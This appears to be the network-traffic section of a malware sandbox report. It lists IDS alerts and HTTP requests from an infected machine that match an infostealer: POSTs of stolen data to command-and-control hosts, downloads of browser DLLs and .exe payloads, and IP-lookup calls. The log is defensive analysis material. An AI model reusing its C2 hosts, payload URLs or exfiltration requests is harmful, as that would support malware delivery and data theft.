Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49880 -> 104.26.13.205:80
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49830 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49885 -> 104.26.13.205:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49890 -> 104.26.13.205:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49905 -> 104.26.13.205:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49895 -> 104.26.13.205:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49900 -> 104.26.13.205:80

Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: api64.ipify.org
Source: global traffic	HTTP traffic detected: GET /widget/demo/8.46.123.33 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /1nhuM4.js HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: iplogger.org
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: questionsmw.store
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: soldiefieop.site
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCBFHJECAKEHIECGIEBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: abnomalrkmu.site
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: treatynreit.site
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIEGHJEGHJKFIEBFHJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: snarlypagowo.site
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EBGIDGCAFCBKECAAKJJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mysterisop.site
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIJEGDBGDBFIJKECBAKFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: absorptioniw.site
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJEGCAEGIIIDHIEBKEBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 6273Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: gravvitywio.store
Source: global traffic	HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BKFCAFCFBAEHIDHJDBGCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EBGCGHIDHCBFHIDGHCBKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 1529Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHDBGHJKFIDHJJJEBKEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CAAKKFHCFIECAAAKEGCFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAFBGIJKEGIECAAFHDHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJEGIEHIJKKFIDHDGIDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKFIDAAEHIEGCBFIDBFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJEGCAEGIIIDHIEBKEBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 461Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCBFHJECAKEHIECGIEBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 158589Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KFIDBAFHCAKFBGCBFHIJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDAKJJDBGCAKKFHIJEGHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 499Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: questionsmw.store
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIECGCAEBFIIDHIDGIEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 499Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: soldiefieop.site
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAFBGHCAKKFCAKEBKJKKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 499Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: abnomalrkmu.site
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: treatynreit.site
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AFIEGIECGCBKFIEBGCAAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: snarlypagowo.site
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mysterisop.site
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: absorptioniw.site
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: gravvitywio.store
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KKKJEHCGCGDAAAKFHJKJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBGCAFIIECBFIDHIJKFBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGCFCAKFHCGCBFHCGHDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AEHIDAKECFIEBGDHJEBKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGCFCAKFHCGCBFHCGHDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 6237Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: questionsmw.store
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHIIEHJKKECGCBFIIJDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: soldiefieop.site
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: abnomalrkmu.site
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: treatynreit.site
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: snarlypagowo.site
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mysterisop.site
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: absorptioniw.site
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: gravvitywio.store
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKFCGIJKJKFHIDHIIIEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FCFHJKJJJECGDHJJDHDAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IECGIEBAEBFIIECBGCBGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAEHJJECAEGCAAAAEGIEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IECGIEBAEBFIIECBGCBGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 6121Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBAKKKFBGDHJKFHJJJJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCBAKJEHDBGHIEBGCGDGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBKJJEHCBAKFBFHJKFBKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAFBAKECAEGCBFIEGDGIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AKECBFBAEBKJJJJKFCGCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIIEGDBKJKEBGCBAFCFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 6089Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ECBGHCGCBKFIECBFHIDGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/wp-ping.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 41.216.188.190
Source: global traffic	HTTP traffic detected: POST /api/wp-admin.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Content-Length: 133Host: 41.216.188.190
Source: global traffic	HTTP traffic detected: POST /api/wp-admin.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Content-Length: 133Host: 41.216.188.190
Source: global traffic	HTTP traffic detected: HEAD /prog/66fbfcc301a31_swws.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: HEAD /ldms/66fbfccd837ac_vadggdsa.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ldms/66fbfccd837ac_vadggdsa.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66fbfcc301a31_swws.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api/wp-admin.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Content-Length: 349Host: 41.216.188.190
Source: global traffic	HTTP traffic detected: GET /ldms/66fbfcc9963ca_ldfsna.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FIECBFIDGDAKFHIEHJKFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: cowod.hopto.orgContent-Length: 5785Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
